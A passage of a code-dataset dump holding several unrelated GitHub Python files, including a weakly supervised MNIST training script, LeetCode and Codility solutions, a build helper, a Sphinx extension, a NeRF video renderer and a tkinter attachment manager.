(ndarray)\n batch_size: number of images per batch (int)\n fmodel: pretrained Keras autoencoder which outputs encoder per image (Keras Model)\n num_instances: number of images per bag (int)\n num_clusters: number of clusters to extract from latent space (int)\n fraction_class: percentage of bag which is reflective of bag label (float between 0 and 1)\n\n Returns:\n Batch containing image, label and estimated label\n \"\"\"\n\n # Get encodings from model\n\tx_latent = x.reshape((len(x), np.prod(x.shape[1:])))\n\tz_mean, z_log = fmodel.predict(x_latent, batch_size=100)\n\n\t# Perform KMeans once at start\n\tkmeans = KMeans(n_clusters=num_clusters, random_state=0).fit(z_mean)\n\tclass_mean = kmeans.cluster_centers_\n\tlabels = kmeans.labels_\n\n\twhile True:\n\n\t\ty_dense = np.argmax(y, axis=1)\n\t\tindices = np.arange(len(y))\n\t\tnp.random.shuffle(indices)\n\n\t\tnum_correct_instances = int(math.ceil(fraction_class * float(num_instances)))\n\t\tnum_random_instances = num_instances - num_correct_instances\n\n\t\tif num_correct_instances == 0:\n\t\t\traise (\"No positive labels in bag! We need to have a minimum of 1.\")\n\n\t\t# --------------- Setup MNIST-BAG --------------- \n\t\t# Split dataset so that a certain proportion of labels are in a bag\n\t\tif fraction_class < 1:\n\t\t\tsorted_classes = np.argsort(y_dense)\n\t\t\tif num_random_instances > 0:\n\t\t\t\tindices_toshuffle = np.array([])\n\t\t\t\tfor kdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tindices_toshuffle = np.concatenate((indices_toshuffle, np.arange(kdx, kdx + num_random_instances)),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\taxis=0)\n\n\t\t\t\tindices_toshuffle = indices_toshuffle.astype('int32')\n\t\t\t\tnp.random.shuffle(indices_toshuffle)\n\n\t\t\t\ti = 0\n\t\t\t\tfor jdx in range(num_correct_instances, len(y_dense) - num_instances, num_instances):\n\t\t\t\t\tsorted_classes[jdx: jdx + num_random_instances] = sorted_classes[\n\t\t\t\t\t\t\tindices_toshuffle[i: min(len(y_dense), i + num_random_instances)]]\n\t\t\t\t\ti = i + num_random_instances\n\n\t\t# Shuffle bags\n\t\tsorted_classes = sorted_classes.reshape(int(len(y_dense) / num_instances), num_instances)\n\t\tnp.random.shuffle(sorted_classes)\n\t\tindices = sorted_classes.flatten()\n\n\t\t# Generate new bag-level labels\n\t\tnew_y = np.zeros((len(y), 1))\n\t\tfor idx in range(0, len(y), num_instances):\n\t\t\t\t# Retrieve label for first image in bag\n\t\t\t\tmax_occ = y_dense[indices[idx]]\n\t\t\t\tnp.random.shuffle(indices[idx:idx + num_instances])\t# shuffle images\n\n\t\t\t\t# Set \"real\" weak label\n\t\t\t\tnew_y[indices[idx: idx + num_instances]] = max_occ\n\n\t\t# Perform majority vote to get estimated class label per cluster\n\t\tnew_labels = np.zeros((num_clusters), dtype='int32')\n\t\tfor a in range(0, num_clusters):\n\t\t\tlst = new_y[np.where(labels == a)[0]].squeeze().astype('int32')\n\t\t\tcounts = np.bincount(lst, minlength=10)\n\t\t\tnew_labels[a] = np.argmax(counts)\n\n\n\t\ty_c = to_categorical(new_y.flatten(), 10)\n\t\tfor start_idx in range(0, len(new_y), batch_size):\n\n\t\t\t# Gather estimated class for current batch\n\t\t\tdist_cat = to_categorical(new_labels[labels[indices[start_idx: start_idx + batch_size]]], 10)\n\n\t\t\tyield [x[indices[start_idx: start_idx + batch_size]], dist_cat,\n\t\t\t\t\ty_c[indices[start_idx: start_idx + batch_size]]], y_c[indices[start_idx: start_idx + batch_size]]\n\n\ndef train_autoencoder(vae_model, vae_name, num_epochs=500):\n\t\"\"\" Train simple (variational) autoencoder\n\n Args:\n vae_model: \"vae\", \"conv_vae\" or \"ae\" depending on what type of model is to be trained (string)\n vae_name: location and name of model once trained (string)\n num_epochs: number of epochs for training (int)\n\n Returns:\n Trained Keras Model\n \"\"\"\n\tprint(vae_model.summary())\n\n\tprint(\"Training VAE model...\")\n\tstart_time = time.time()\n\t(x_train, y_train), _ = mnist.load_data()\n\tx_train = x_train[:, np.newaxis, ...] / 255.\n\tx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\n\n\tvae_model.fit(x_train, x_train, batch_size=batch_size, epochs=num_epochs)\n\tprint(\"completed in {:.3f}s\".format(time.time() - start_time))\n\t\n\tprint(\"Trained variational autoencoder.\")\n\tvae_model.save('./latent_models/mnist_ae_64f_500e.h5')\n\n\treturn vae_model\n\n\ndef run_test_example(x_test, y_test, model):\n\t\"\"\"Simple predict function\n\n Returns:\n Test accuracy rate\n \"\"\"\n\tnew_model = Model(inputs=[model.get_layer('input_data').input],\n\t\t\t\t\t\t\toutputs=[model.get_layer('p_out').output])\n\n\tpredictions = new_model.predict(x_test, batch_size=64)\n\n\ttest_accuracy = float(np.sum(np.argmax(y_test, axis=1) == np.argmax(predictions, axis=1))) / len(y_test)\n\tprint(\"test accuracy: \", test_accuracy)\n\n\treturn test_accuracy\n\n\ndef get_latent_model(encoder_type, batch_size=100, latent_dim=FV_LENGTH):\n\t\"\"\"Calls function in latent.py depending on encoder_type - see train_autoencoder(...)\n \"\"\"\n\t\n\tif encoder_type == 'vae':\n\t\tvae_model = latent.get_vae_model(batch_size, latent_dim=latent_dim)\n\t\tvae_model.load_weights('./latent_models/mnist_vae_dense.h5')\n\t\tvae_model.outputs = [vae_model.get_layer('z_mean').output]\n\t\tvae_model._make_predict_function()\n\t\tvmodel = vae_model\n\t \n\telif encoder_type == 'conv_vae':\n\t\tdeepvae_model = latent.get_convvae_model()\n\t\tdeepvae_model.load_weights('./latent_models/mnist_vae_conv.h5')\n\t\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output]\n\t\tdeepvae_model._make_predict_function(batch_size, latent_dim=latent_dim)\n\t\tvmodel = deepvae_model\n\t \n\telse:\n\t\tae_model = latent.get_ae_model(batch_size, latent_dim=latent_dim)\n\t\tae_model.load_weights('./latent_models/mnist_ae.h5')\n\t\tae_model.outputs = [ae_model.get_layer('z').output]\n\t\tae_model._make_predict_function()\n\t\tvmodel = ae_model\n\t\n\treturn vmodel\n\t\n\nif __name__ == \"__main__\":\n\n\tbatch_size = 100\n\tloss_type = \"cluster_class\"\n\talpha = 0.5\n\tcluster_type = 'conv_vae'\n\tnum_k_clusters = 100\n\tnum_epochs = 5\n\n\tsearch_num_instances = [5, 25, 50, 100, 200]\n\tsearch_fraction = [0.5]\n\n\tstart_time = time.time()\n\tmibl_model = get_model(loss_type, alpha)\n\n\t# presave weights so that we can set it back to original model after training (see below)\n\told_weights = mibl_model.get_weights()\n\n\t(x_train, y_train), (x_test, y_test) = mnist.load_data()\n\tx_test = x_test[:, np.newaxis, ...] / 255.\n\tx_train = x_train[:, np.newaxis, ...] / 255.\n\ty_train = to_categorical(y_train, 10)\n\ty_test = to_categorical(y_test, 10)\n \n # train latent representation and save into predefined folder\n\tdeepvae_model = latent.get_convvae_model(latent_dim=FV_LENGTH)\n\t#train_autoencoder(deepvae_model, './latent_models/mnist_convvae_64f_500e.h5')\t\t\n\n\t# throw away the decoder part of the network\n\tdeepvae_model.load_weights('./latent_models/mnist_convvae_64f_500e.h5')\n\tdeepvae_model.outputs = [deepvae_model.get_layer('z_mean').output, deepvae_model.get_layer('z_log').output]\n\tdeepvae_model._make_predict_function()\n\n\tprint(\"Training CNN...\")\n\tfor s in search_num_instances:\n\t\tfor f in search_fraction:\n\t\t\t\n\t\t\ttest_accuracy = []\n\n\t\t\t# repeat same experiment 10 times to meaure variability\n\t\t\tfor r in range(10):\n\t\t\t\tni = s\n\t\t\t\tfraction = f\n\n\t\t\t\tmibl_model.compile(loss={'joint_loss': lambda y_true, y_pred: y_pred}, optimizer=\"adam\")\n\n\t\t\t\t# Train - MNIST-BAG prepared in generator\n\t\t\t\tmibl_model.fit_generator(\n\t\t\t\t\tminibatch_mibl_gen(x_train, y_train, batch_size, deepvae_model,\n\t\t\t\t\t\t\t\t\t\t\tni, num_clusters=num_k_clusters, fraction_class=f),\n\t\t\t\t\tsteps_per_epoch=len(y_train) / batch_size,\n\t\t\t\t\tepochs=num_epochs)\n\n\t\t\t\tacc = run_test_example(x_test, y_test, mibl_model)\n\t\t\t\ttest_accuracy.append(acc)\n\t\t\t\tmibl_model.set_weights(old_weights)\n\n\t\t\tprint(\">> n = \" + str(s) + \", a = \" + str(alpha) + \", fraction = \" + str(f))\n\t\t\tprint(\"mean accuracy: {}, std accuracy: {}\".format(np.mean(np.array(test_accuracy)), np.std(np.array(test_accuracy)))) \n\n# mibl_model.save(\"./mnist_model.h5\")\n","repo_name":"shaziaakbar/cluster-mil","sub_path":"mnist-bag.py","file_name":"mnist-bag.py","file_ext":"py","file_size_in_byte":9728,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71888510889","text":"# leetcode 1466. Reorder Routes to Make All Paths Lead to the City Zero\n# https://leetcode.com/problems/reorder-routes-to-make-all-paths-lead-to-the-city-zero/description/\nclass Solution:\n def minReorder(self, n: int, connections: List[List[int]]) -> int:\n roads = set()\n graph = defaultdict(set)\n\n for s, e in connections:\n roads.add((s, e))\n graph[s].add(e)\n graph[e].add(s)\n answer = 0\n q = deque()\n\n q.append((0, -1))\n\n while q:\n node, parent = q.popleft()\n if (parent, node) in roads:\n answer += 1\n\n for child in graph[node]:\n if child == parent:\n continue\n q.append((child, node))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/3월/0324/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73113857447","text":"#!/usr/bin/env python3\nimport argparse\nimport os\nimport pkgutil\nimport re\nimport sys\n\n# Don't make .pyc files\nsys.dont_write_bytecode = True\n\nscripts_dir = os.path.dirname(os.path.realpath(__file__))\nproject_dir = os.path.dirname(scripts_dir)\nbuild_dir = os.path.join(project_dir, \"build\")\n\n# Build our cmake cache\ncmake_cache = {}\n\ndirs = [build_dir]\ntry:\n dirs.extend([os.path.join(build_dir, f) for f in os.listdir(build_dir)])\nexcept FileNotFoundError:\n pass\n\nfor d in dirs:\n if os.path.isfile(os.path.join(d, \"CMakeCache.txt\")):\n with open(os.path.join(project_dir, d, \"CMakeCache.txt\"), \"r\") as f:\n cmake_cache_text = f.readlines()\n break\n\n# If we still didn't find anything\ntry:\n cmake_cache_text\nexcept NameError:\n cmake_cache_text = []\n\n# Go and process our lines in our cmake file\nfor l in cmake_cache_text:\n\n # Remove whitespace at the ends and start\n l = l.strip()\n\n # Remove lines that are comments\n if len(l) > 0 and not l.startswith(\"//\") and not l.startswith(\"#\"):\n # Extract our variable name from our values\n g = re.match(r\"([a-zA-Z_$][a-zA-Z_.$0-9-]*):(\\w+)=(.*)\", l).groups()\n\n # Store our value and split it into a list if it is a list\n cmake_cache[g[0]] = g[2] if \";\" not in g[2].strip(\";\") else g[2].strip(\";\").split(\";\")\n\n# Try to find our source and binary directories\ntry:\n binary_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_BINARY_DIR\"]\nexcept KeyError:\n binary_dir = None\n\ntry:\n source_dir = cmake_cache[cmake_cache[\"CMAKE_PROJECT_NAME\"] + \"_SOURCE_DIR\"]\nexcept:\n source_dir = project_dir\n\nif __name__ == \"__main__\":\n\n # Root parser information\n command = argparse.ArgumentParser(\n description=\"This script is an optional helper script for performing common tasks for working with the NUClear roles system.\"\n )\n subcommands = command.add_subparsers(\n dest=\"command\", help=\"The command to run from the script. See each help for more information.\"\n )\n subcommands.required = True\n\n # Look through the various tools to see if we can find one that matches our arguments\n # If we do we don't need to load all the tools and can just trigger this one directly\n # This saves importing things we don't need\n for dirpath, dnames, fnames in os.walk(scripts_dir):\n for f in fnames:\n if f != \"__init__.py\" and f.endswith(\".py\"):\n\n # Check if this is the tool for the job\n components = os.path.relpath(os.path.join(dirpath, f[:-3]), scripts_dir).split(os.sep)\n if sys.argv[1 : len(components) + 1] == components:\n\n # Load the module\n module = pkgutil.find_loader(\".\".join(components)).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n # Build up the base subcommands to this point\n subcommand = subcommands\n for c in components[:-1]:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n\n module.register(subcommand.add_parser(components[-1]))\n module.run(**vars(command.parse_args()))\n\n # We're done, exit\n exit(0)\n\n # If we reach this point, we couldn't find a tool to use.\n # In this case we need to look through all the tools so we can register them all.\n # This will provide a complete help for the function call so the user can try again\n tools = {}\n for importer, modname, ispkg in pkgutil.walk_packages([scripts_dir]):\n # Tools aren't in packages\n if not ispkg:\n\n # Load the modules and check it's a tool\n components = modname.split(\".\")\n try:\n module = pkgutil.find_loader(modname).load_module()\n if hasattr(module, \"register\") and hasattr(module, \"run\"):\n\n subcommand = subcommands\n tool = tools\n for c in components[:-1]:\n if c in tool:\n tool, subcommand = tool[c]\n else:\n subcommand = subcommand.add_parser(c).add_subparsers(\n dest=\"{}_command\".format(c),\n help=\"Commands related to working with {} functionality\".format(c),\n )\n subcommand.required = True\n tool[c] = ({}, subcommand)\n tool = tool[c][0]\n\n module.register(subcommand.add_parser(components[-1]))\n except ModuleNotFoundError as e:\n print(\"Could not load the tool '{}': {}\".format(modname.replace(\".\", \" \"), e))\n except BaseException as e:\n pass\n\n # Given what we know, this will fail here and give the user some help\n command.parse_args()\n","repo_name":"NUbots/NUWebots","sub_path":"scripts/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":5203,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"29725464295","text":"def solution(N: int, A: list):\n max_val, tmp_max = 0, 0\n result = [0] * N\n for item in A:\n if item > N:\n max_val = tmp_max\n else:\n if result[item - 1] < max_val:\n result[item - 1] = max_val + 1\n else:\n result[item - 1] += 1\n tmp_max = max(tmp_max, result[item - 1])\n for idx in range(len(result)):\n if result[idx] < max_val:\n result[idx] = max_val\n return result\n\n\nA = [3, 4, 4, 6, 1, 4, 4]\nN = 5\nassert solution(N, A) == [3, 2, 2, 4, 2]\n","repo_name":"Dopiz/Codility-Lessons","sub_path":"Lesson 4 - MaxCounters.py","file_name":"Lesson 4 - MaxCounters.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30061114472","text":"#Ask the user for their name and save as variable name\r\nname = input(\"What is your name?\")\r\n\r\n#Check if their name is frank or george\r\nif name == \"frank\" or name == \"george\":\r\n\r\n #say hello\r\n print(\"Hello\" + \" \" + name)\r\n\r\n#if their name is not frank or george\r\nelse:\r\n\r\n #Say no\r\n print(\"Sorry, you cannot access the system\")","repo_name":"HBlack09/ICTPRG-Python","sub_path":"Introduction to Selection Quiz/Question 1.py","file_name":"Question 1.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27909999544","text":"import imageio\r\n\r\n# models\r\nfrom models import *\r\nfrom renderer import *\r\nfrom data.ray_utils import get_rays\r\nfrom scipy.spatial.transform import Rotation as R\r\n\r\nfrom tqdm import tqdm\r\n\r\n# pytorch-lightning\r\n\r\nfrom data.ray_utils import ray_marcher\r\nfrom data.llff import LLFFDataset\r\n\r\ntorch.cuda.set_device(0)\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '0'\r\n\r\n\r\ndef decode_batch(batch):\r\n rays = batch['rays'] # (B, 8)\r\n rgbs = batch['rgbs'] # (B, 3)\r\n return rays, rgbs\r\n\r\n\r\ndef unpreprocess(data, shape=(1, 1, 3, 1, 1)):\r\n # to unnormalize image for visualization\r\n # data N V C H W\r\n device = data.device\r\n mean = torch.tensor([-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225]).view(*shape).to(device)\r\n std = torch.tensor([1 / 0.229, 1 / 0.224, 1 / 0.225]).view(*shape).to(device)\r\n\r\n return (data - mean) / std\r\n\r\n\r\ndef normalize(x):\r\n return x / np.linalg.norm(x, axis=-1, keepdims=True)\r\n\r\n\r\ndef viewmatrix(z, up, pos):\r\n vec2 = normalize(z)\r\n vec1_avg = up\r\n vec0 = normalize(np.cross(vec1_avg, vec2))\r\n vec1 = normalize(np.cross(vec2, vec0))\r\n m = np.eye(4)\r\n m[:3] = np.stack([vec0, vec1, vec2, pos], 1)\r\n return m\r\n\r\n\r\ndef ptstocam(pts, c2w):\r\n tt = np.matmul(c2w[:3, :3].T, (pts - c2w[:3, 3])[..., np.newaxis])[..., 0]\r\n return tt\r\n\r\n\r\ndef poses_avg(poses):\r\n center = poses[:, :3, 3].mean(0)\r\n vec2 = normalize(poses[:, :3, 2].sum(0))\r\n up = poses[:, :3, 1].sum(0)\r\n c2w = viewmatrix(vec2, up, center)\r\n\r\n return c2w\r\n\r\n\r\ndef render_path_spiral(c2w, up, rads, focal, zdelta, zrate, N_rots=2, N=120):\r\n render_poses = []\r\n rads = np.array(list(rads) + [1.])\r\n\r\n for theta in np.linspace(0., 2. * np.pi * N_rots, N + 1)[:-1]:\r\n c = np.dot(c2w[:3, :4], np.array([np.cos(theta), -np.sin(theta), -np.sin(theta * zrate), 1.]) * rads)\r\n z = normalize(c - np.dot(c2w[:3, :4], np.array([0, 0, -focal, 1.])))\r\n render_poses.append(viewmatrix(z, up, c))\r\n return render_poses\r\n\r\n\r\ndef get_spiral(c2ws_all, near_far, rads_scale=0.5, N_views=120):\r\n # center pose\r\n c2w = poses_avg(c2ws_all)\r\n\r\n # Get average pose\r\n up = normalize(c2ws_all[:, :3, 1].sum(0))\r\n\r\n # Find a reasonable \"focus depth\" for this dataset\r\n close_depth, inf_depth = near_far\r\n dt = .75\r\n mean_dz = 1. / (((1. - dt) / close_depth + dt / inf_depth))\r\n focal = mean_dz\r\n\r\n # Get radii for spiral path\r\n zdelta = close_depth * .2\r\n tt = c2ws_all[:, :3, 3] - c2w[:3, 3][None]\r\n rads = np.percentile(np.abs(tt), 70, 0) * rads_scale\r\n render_poses = render_path_spiral(c2w, up, rads, focal, zdelta, zrate=.5, N=N_views)\r\n return np.stack(render_poses)\r\n\r\n\r\ndef position2angle(position):\r\n ''' nx3 '''\r\n position = normalize(position)\r\n theta = np.arccos(position[:, 2]) / np.pi * 180\r\n phi = np.arctan2(position[:, 1], position[:, 0]) / np.pi * 180\r\n return [theta, phi]\r\n\r\n\r\ndef pose_spherical_nerf(euler, radius=4.0):\r\n c2ws_render = np.eye(4)\r\n c2ws_render[:3, :3] = R.from_euler('xyz', euler, degrees=True).as_matrix()\r\n c2ws_render[:3, 3] = c2ws_render[:3, :3] @ np.array([0.0, 0.0, -radius])\r\n return c2ws_render\r\n\r\n\r\ndef nerf_video_path(c2ws, theta_range=10, phi_range=20, N_views=120):\r\n rotvec = []\r\n for i in range(c2ws.shape[0]):\r\n r = R.from_matrix(c2ws[i, :3, :3])\r\n euler_ange = r.as_euler('xyz', degrees=True).reshape(1, 3)\r\n if i:\r\n mask = np.abs(euler_ange - rotvec[0]) > 180\r\n euler_ange[mask] += 360.0\r\n rotvec.append(euler_ange)\r\n rotvec = np.mean(np.stack(rotvec), axis=0)\r\n render_poses = [pose_spherical_nerf(rotvec + np.array([angle, 0.0, -phi_range]), 4.0) for angle in\r\n np.linspace(-theta_range, theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(-phi_range, phi_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([angle, 0.0, phi_range]), 4.0) for angle in\r\n np.linspace(theta_range, -theta_range, N_views // 4, endpoint=False)]\r\n render_poses += [pose_spherical_nerf(rotvec + np.array([-theta_range, 0.0, angle]), 4.0) for angle in\r\n np.linspace(phi_range, -phi_range, N_views // 4, endpoint=False)]\r\n render_poses = torch.from_numpy(np.stack(render_poses)).float().to(device)\r\n return render_poses\r\n\r\ndef render_video(args):\r\n for i_scene, scene in enumerate([args.datadir.split('/')[-1]]):\r\n if args.is_finetuned:\r\n args.ckpt = f'./runs_fine_tuning/{scene}/ckpts/latest.tar'\r\n args.video_name = 'DSft_'\r\n else:\r\n args.video_name = ''\r\n\r\n args.use_viewdirs = True\r\n args.feat_dim = 8 + 3 * 4\r\n\r\n # create models\r\n if i_scene == 0 or args.is_finetuned:\r\n # Create nerf model\r\n render_kwargs_train, render_kwargs_test, start, grad_vars = \\\r\n create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)\r\n filter_keys(render_kwargs_train)\r\n # Create mvs model\r\n MVSNet = render_kwargs_train['network_mvs']\r\n render_kwargs_train.pop('network_mvs')\r\n\r\n datatype = 'val'\r\n pad = 24 # the padding value should be same as your finetuning ckpt\r\n args.chunk = 5120\r\n\r\n dataset = LLFFDataset(args, split=datatype)\r\n\r\n save_dir = f'./results'\r\n os.makedirs(save_dir, exist_ok=True)\r\n MVSNet.train()\r\n MVSNet = MVSNet.cuda()\r\n\r\n with torch.no_grad():\r\n\r\n c2ws_all = dataset.poses\r\n\r\n if args.is_finetuned:\r\n # large baseline\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature = torch.load(args.ckpt)['volume']['feat_volume']\r\n volume_feature = RefVolume(volume_feature.detach()).cuda()\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n else:\r\n # neighboring views with position distance\r\n imgs_source, proj_mats, near_far_source, pose_source = dataset.read_source_views(device=device)\r\n volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad, lindisp=args.use_disp)\r\n\r\n pad *= args.imgScale_test\r\n pair_idx = torch.load('configs/pairs.th')[f'{scene}_train']\r\n c2ws_render = get_spiral(c2ws_all[pair_idx], near_far_source, rads_scale=0.6,\r\n N_views=180) # you can enlarge the rads_scale if you want to render larger baseline\r\n\r\n c2ws_render = torch.from_numpy(np.stack(c2ws_render)).float().to(device)\r\n\r\n imgs_source = unpreprocess(imgs_source)\r\n\r\n try:\r\n tqdm._instances.clear()\r\n except Exception:\r\n pass\r\n\r\n frames = []\r\n img_directions = dataset.directions.to(device)\r\n for i, c2w in enumerate(tqdm(c2ws_render)):\r\n torch.cuda.empty_cache()\r\n\r\n rays_o, rays_d = get_rays(img_directions, c2w) # both (h*w, 3)\r\n rays = torch.cat([rays_o, rays_d,\r\n near_far_source[0] * torch.ones_like(rays_o[:, :1]),\r\n near_far_source[1] * torch.ones_like(rays_o[:, :1])],\r\n 1).to(device) # (H*W, 3)\r\n\r\n N_rays_all = rays.shape[0]\r\n rgb_rays, depth_rays_preds = [], []\r\n for chunk_idx in range(N_rays_all // args.chunk + int(N_rays_all % args.chunk > 0)):\r\n xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(\r\n rays[chunk_idx * args.chunk:(chunk_idx + 1) * args.chunk],\r\n N_samples=args.N_samples, lindisp=args.use_disp)\r\n\r\n # Converting world coordinate to ndc coordinate\r\n H, W = imgs_source.shape[-2:]\r\n inv_scale = torch.tensor([W - 1, H - 1]).to(device)\r\n w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()\r\n xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,\r\n near=near_far_source[0], far=near_far_source[1], pad=pad,\r\n lindisp=args.use_disp)\r\n\r\n # rendering\r\n rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,\r\n xyz_NDC, z_vals, rays_o, rays_d,\r\n volume_feature, imgs_source,\r\n **render_kwargs_train)\r\n\r\n rgb, depth_pred = torch.clamp(rgb.cpu(), 0, 1.0).numpy(), depth_pred.cpu().numpy()\r\n rgb_rays.append(rgb)\r\n depth_rays_preds.append(depth_pred)\r\n\r\n depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)\r\n depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)\r\n\r\n rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)\r\n H_crop, W_crop = np.array(rgb_rays.shape[:2]) // 20\r\n rgb_rays = rgb_rays[H_crop:-H_crop, W_crop:-W_crop]\r\n depth_rays_preds = depth_rays_preds[H_crop:-H_crop, W_crop:-W_crop]\r\n img_vis = np.concatenate((rgb_rays * 255, depth_rays_preds), axis=1)\r\n\r\n frames.append(img_vis.astype('uint8'))\r\n\r\n imageio.mimwrite(f'{save_dir}/{args.video_name}{scene}.mov', np.stack(frames), fps=30, quality=10)\r\n os.system(f\"ffmpeg -i {save_dir}/{args.video_name}{scene}.mov -vcodec h264 -acodec mp2 {save_dir}/{args.video_name}{scene}.mp4\")\r\n os.system(f\"rm {save_dir}/{args.video_name}{scene}.mov\")\r\n\r\n","repo_name":"Yuchen-Song/DS-MVSNeRF","sub_path":"render_video.py","file_name":"render_video.py","file_ext":"py","file_size_in_byte":10482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19326058906","text":"import os\nfrom docutils import nodes\nfrom docutils.statemachine import ViewList\nfrom sphinx.util.docutils import SphinxDirective\nfrom sphinx.util.nodes import nested_parse_with_titles\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nwith open('{}/example.rst.tmpl'.format(dir_path), 'r') as f:\n lines = f.readlines()\n\n\ndef make_example(dir):\n path = '../../examples/{0}/{0}'.format(dir)\n rst = ViewList()\n line_no = 0\n for line in lines:\n line_no += 1\n line = line.format(path).rstrip()\n rst.append(line, 'example.rst', line_no)\n return rst\n\n\nclass ExampleDirective(SphinxDirective):\n has_content = True\n\n def run(self):\n dir = self.content[0]\n rst = make_example(dir)\n node = nodes.section()\n node.document = self.state.document\n nested_parse_with_titles(self.state, rst, node)\n return node.children\n\n\ndef setup(app):\n app.add_directive('example', ExampleDirective)\n return {\n 'parallel_read_safe': True,\n 'parallel_write_safe': True,\n }\n","repo_name":"udondan/iam-floyd","sub_path":"docs/source/extensions/example/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":524,"dataset":"github-code","pt":"53"} +{"seq_id":"9662906338","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 14 13:22:32 2017\n\n@author: Kozmik\n\"\"\"\n\nimport DateTools as DT\nfrom os.path import abspath\nfrom os.path import exists\nfrom os.path import join\nfrom os import listdir\nfrom os import rename\nfrom os import mkdir\nfrom os import remove\nfrom os import rmdir\nfrom shutil import copy\nfrom subprocess import Popen\nimport PIL.Image as PI\nfrom PIL import ImageTk\nfrom tkinter import filedialog as filedialog\nfrom tkinter import messagebox as messagebox\nimport tkinter as tk\nimport tkinter.ttk as ttk\n\nclass AttachmentManager(tk.Frame):\n def __init__(self, master, controller, jobject, jentry, **kw):\n self.master = master\n self.controller = controller\n self.journal = jobject\n self.entry = jentry\n self.args = kw\n self.all_attachments = []\n self.dialog = None\n self.frame = None\n self.DELETE = None\n self.buttonlist = None\n self.delete_icon = None\n \n self.trashcan = join(self.args['homepath'], 'Resources\\\\Trash_Can-512.png')\n self.app_icon = join(self.args['homepath'], 'Resources\\\\web.ico')\n self.parentpath = join(self.args['homepath'], 'Attachments\\\\') \n try:\n mkdir(self.parentpath)\n except FileExistsError:\n pass\n self.temppath = self.parentpath + 'temp\\\\'\n self.currentpath = self.temppath\n# try:\n# mkdir(self.currentpath)\n# except FileExistsError:\n if exists(abspath(self.currentpath)):\n self.delete()\n \n ttk.Frame.__init__(self, self.master)\n self.NEW = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Add Attachment', \n command=self.askForAttachment)\n self.DISPLAY = ttk.Button(self, takefocus=0, style='UI.TButton', \n text='Display Attachments', \n command=self.displayAttachments, \n state=tk.DISABLED)\n self.NEW.pack(fill=tk.X)\n self.DISPLAY.pack(fill=tk.X)\n \n def updateGUI(self, jentry):\n \"\"\"Checks to see if the current JEntry has attachments and aligns variables, if so.\n Has exclusive control to generation of 'temp' folder.\"\"\"\n self.all_attachments = []\n if exists(self.temppath):\n self.current = self.temppath\n self.delete()\n self.DISPLAY.config(state=tk.DISABLED)\n self.entry = jentry\n date = self.entry.getDate()\n if date:\n attachments = self.entry.getAttachments()\n path = self.parentpath + DT.getDateFileStorageFormat(date) + '\\\\'\n filepath = exists(path)\n if not attachments and not filepath:\n self.currentpath = self.temppath\n mkdir(self.currentpath)\n elif attachments and not filepath:\n message = 'The directory for this journal entry could not be ' +\\\n 'located. Do you want the application to create a new ' +\\\n 'directory with a list of the missing files?'\n# if len(attachments) > 1:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachments are missing: '\n# message += attachments[0] + '. Do you want to restore them?'\n# for item in range(1, len(attachments)):\n# message += ', ' + attachments[item]\n# else:\n# message = 'The directory for this journal entry could ' +\\\n# 'not be located. The following attachment is missing: '\n# message += attachments[0] + '. Do you want to restore it?'\n choice = messagebox.askyesno(title='Missing Directory', \n message=message)\n if choice:\n self.currentpath = path\n mkdir(self.currentpath)\n# self.askForAttachment()\n path = join(self.currentpath, 'Missing Files.txt')\n file = open(path, 'w+')\n for item in attachments:\n file.write(item + '\\n\\n')\n file.close()\n# message = 'The list of missing files can be found at:\\n\\n' +\\\n# self.currentpath\n# messagebox.showinfo()\n Popen(r'explorer 